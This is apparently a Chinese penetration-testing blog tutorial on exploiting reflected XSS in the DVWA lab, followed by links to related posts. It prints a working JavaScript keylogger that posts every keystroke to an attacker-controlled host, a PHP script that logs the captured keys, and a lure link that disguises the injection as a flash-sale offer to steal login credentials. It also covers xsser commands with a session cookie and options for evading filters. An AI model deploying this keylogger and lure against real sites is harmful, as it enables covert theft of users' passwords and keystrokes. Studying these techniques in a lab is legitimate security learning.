XSS

原则上:只要XSS漏洞存在,可以编写任何功能的js脚本

【反射型漏洞利用】

键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上

服务器:kali    客户端

启动apache2服务:service apache2 start

语法:<script src="http://192.168.1.127/keylogger.js"></script>

keylogger.js    

 document.onkeypress = function(evt) {

         evt = evt || window.event

         key = String.fromCharCode(evt.charCode)

         if(key) {

                 var http = new XMLHttpRequest();

                 var param = encodeURI(key)

                 http.open("POST","http://192.168.1.127/keylogger.php",true);

                 http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

                 http.send("key="+param);

         }

 }

 ~

keylogger.php  【用来接受客户端提交上来的数据】

 <?php

 $key=$_POST['key'];

 $logfile="keylog.txt";

 $fp = fopen($logfile,"a");

 fwrite($fp,$key);

 fclose($fp);

 >

为避免被引起用户怀疑,可将跳转命令置于html文件中

前提:用户已经登录网站,获得其cookie信息

#伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码

a.hmlt

 <a href="http://192.168.1.107/dvwa/vulnerabilities/xss_r/?name=<scripr+src='http://192.168.56.102/keylogger.js'></script>">诱人字眼</a>

XSS利用工具

Xsser  【专门针对XSS漏洞,使用python编写】

可使用图形化界面  xsser --gtk  【不建议使用,界面不够友好】

可绕过服务器端输入筛选  【xss存在极其普遍】

1、编码  10进制/16进制

2、函数:unecape()

简单使用语法:xsser -u "http://192.168.56.101/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=31677b04bc31eac6cd78dbb1922e8028" -s -v --reverse-check

GET:将对应页面和参数写进-g参数中;POST:使用-P;-s:统计请求数;-v:显示详细信息;--reverse-check:禁止提交hash值方式验证(此方法存在误判)】

--heuristic  探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}  【所有过滤机制都是基于字符过滤】

对payload编码,绕过服务器短筛选过滤  【过多编码可能造成语义误差】

   *Select Bypasser(s)*:

     These options can be used to encode selected vector(s) to try to

     bypass possible anti-XSS filters on target(s) code and possible IPS

     rules, if the target use it. Also, can be combined with other

     techniques to provide encoding:

     --Str               Use method String.FromCharCode()

     --Une               Use Unescape() function

     --Mix               Mix String.FromCharCode() and Unescape()

     --Dec               Use Decimal encoding

     --Hex               Use Hexadecimal encoding

     --Hes               Use Hexadecimal encoding, with semicolons

     --Dwo               Encode vectors IP addresses in DWORD

     --Doo               Encode vectors IP addresses in Octal

     --Cem=CEM           Try -manually- different Character Encoding Mutations

                         (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

注入技术

   *Special Technique(s)*:

     These options can be used to try to inject code using different type

     of XSS techniques. You can choose multiple:

     --Coo               COO - Cross Site Scripting Cookie injection

     --Xsa               XSA - Cross Site Agent Scripting

     --Xsr               XSR - Cross Site Referer Scripting

     --Dcp               DCP - Data Control Protocol injections

     --Dom               DOM - Document Object Model injections

     --Ind               IND - HTTP Response Splitting Induced code

     --Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)

     --Phpids            PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
   *Select Final injection(s)*:

     These options can be used to specify the final code to inject in

     vulnerable target(s). Important, if you want to exploit on-the-wild

     your discovered vulnerabilities. Choose only one option:

     --Fp=FINALPAYLOAD   OWN    - Insert your final code to inject -manually-

     --Fr=FINALREMOTE    REMOTE - Insert your final code to inject -remotelly-

     --Doss              DOSs   - XSS Denial of service (server) injection

     --Dos               DOS    - XSS Denial of service (client) injection

     --B64               B64    - Base64 code encoding in META tag (rfc2397)

   *Special Final injection(s)*:

     These options can be used to execute some 'special' injection(s) in

     vulnerable target(s). You can select multiple and combine with your

     final code (except with DCP code):

     --Onm               ONM - Use onMouseMove() event to inject code

     --Ifr               IFR - Use <iframe> source tag to inject code

源码分析

低安全级别  【$_GET[]:直接回显输入的数据,不做任何过滤】

  <?php

 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

  $isempty = true;

 } else {

  echo '<pre>';

  echo 'Hello ' . $_GET['name'];

  echo '</pre>';

 }

 ?>

中安全级别  【在输出时替换script为空,可拆分重整script为scriscriptpt】

  <?php

 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

  $isempty = true;

 } else {

  echo '<pre>';

  echo 'Hello ' . str_replace('<script>', '', $_GET['name']);

  echo '</pre>'; 

 }

 ?>

高安全级别【htmlspecialchars():进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如<a href=>】)】{可用burpsuite进行编码}

  <?php

 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

  $isempty = true;

 } else {

  echo '<pre>';

  echo 'Hello ' . htmlspecialchars($_GET['name']);

  echo '</pre>';

 }

 ?>

  

  

小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser的更多相关文章

  1. 小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto

    扫描工具-Nikto #WEB渗透 靶机:metasploitable 靶场:DVWA[默认账号/密码:admin/password] #新手先将DVWA的安全性,调到最低,可容易发现漏洞 侦察[减少 ...

  2. 小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish

    WEB渗透-skipfish Skipfish是一个命令行模式,以C语言编写的积极的Web应用程序的安全性侦察工具,没有代理模式. 它准备了一个互动为目标的网站的站点地图进行一个递归爬网和基于字典的探 ...

  3. 小白日记37:kali渗透测试之Web渗透-手动漏洞挖掘(三)-目录遍历、文件包含

    手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/ ...

  4. 小白日记49:kali渗透测试之Web渗透-XSS(三)-存储型XSS、DOM型XSS、神器BEFF

    存储型XSS与DOM型XSS [XSS原理] 存储型XSS 1.可长期存储于服务器端 2.每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留 ...

  5. 小白日记47:kali渗透测试之Web渗透-XSS(一)

    XSS [推荐书籍:XSS跨站脚本攻击剖析与防御] xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/ ...

  6. 小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

    sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns  [ ...

  7. 小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)

    webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用 ...

  8. 小白日记54:kali渗透测试之Web渗透-补充概念(AJAX,WEB Service)

    补充概念 AJAX(异步javascript和XML) Asynchronous javascript and xml 是一个概念,而非一种新的编程语言,是一组现有技术的组合 通过客户端脚本动态更新页 ...

  9. 小白日记52:kali渗透测试之Web渗透-HTTPS攻击(Openssl、sslscan、sslyze、检查SSL的网站)

    HTTPS攻击 全站HTTPS正策划稿那位潮流趋势 如:百度.阿里 HTTPS的作用 CIA 解决的是信息传输过程中数据被篡改.窃取 [从中注入恶意代码,多为链路劫持] 加密:对称.非对称.单向 HT ...

随机推荐

  1. SharePoint咨询师之路:设计之前的那些事四:负载均衡 - web服务器

     提示:本系列只是一个学习笔记系列,大部分内容都可以从微软官方网站找到,本人只是按照自己的学习路径来学习和呈现这些知识.有些内容是自己的经验和积累,如果有不当之处,请指正. 容量管理 规模 体系结构 ...

  2. ubuntu 安装ssh-server时出现错误:openssh-server: Depends: openssh-client (= 1:5.3p1-3ubuntu3) but 1:5.3p1-3ubuntu4 is to be installed

    错误如下: tiger@ubuntu:~/Desktop/work$ sudo apt-get install openssh-server [sudo] password for tiger: Re ...

  3. Swift项目兼容Objective-C问题汇总

    Swift项目兼容Objective-C问题汇总 转载自 http://www.cocoachina.com/swift/20150608/12025.html 本文是投稿文章,作者:一叶(博客)欢迎 ...

  4. 几种连接不同数据库的ADO.NET字符串

    Data Source=myServerAddress;Initial Catalog=myDataBase;User Id=myUsername;Password=myPassword;或者 Ser ...

  5. Uvalive 4865 Data Recovery 最大流

    题意就是 给一个50 * 50的矩阵 然后给出每行每列元素的和 和一个初始矩阵 矩阵中有些是未知,有些是已知 然后我们求目标矩阵就是把能确定的元素的值求出来,实在不能确定的就置为-1 所有矩阵元素的值 ...

  6. Oracle数据库编程:在JDBC中应用Oracle

    9.在JDBC中应用Oracle: JDBC访问数据库基本步骤:          1.加载驱动          2.获取链接对象          3.创建SQL语句          4.提交S ...

  7. SpringMVC+JPA使用注入的方式环境搭建

    ----------------------------------------------------DAO--------------------------------------------- ...

  8. WPF中的DependencyProperty存储方式详解

    前言 接触WPF有一段时间了,之前虽然也经常使用,但是对于DependencyProperty一直处于一知半解的状态.今天花了整整一下午将这个概念梳理了一下,自觉对这个概念有了较为清晰的认识,之前很多 ...

  9. 无责任Windows Azure SDK .NET开发入门篇二[使用Azure AD 进行身份验证--2.1使用Azure AD需要了解几个概念]

    2.1使用Azure AD需要了解几个概念 l Azure AD目录 当你注册 Microsoft 云服务时,便会获得一个 Azure AD 目录.你可根据需要创建更多的目录.例如,可以将第一个目录保 ...

  10. IAR USING PRE- AND POST-BUILD ACTIONS

    Using pre-build actions for time stamping If necessary, you can specify pre-build and post-build act ...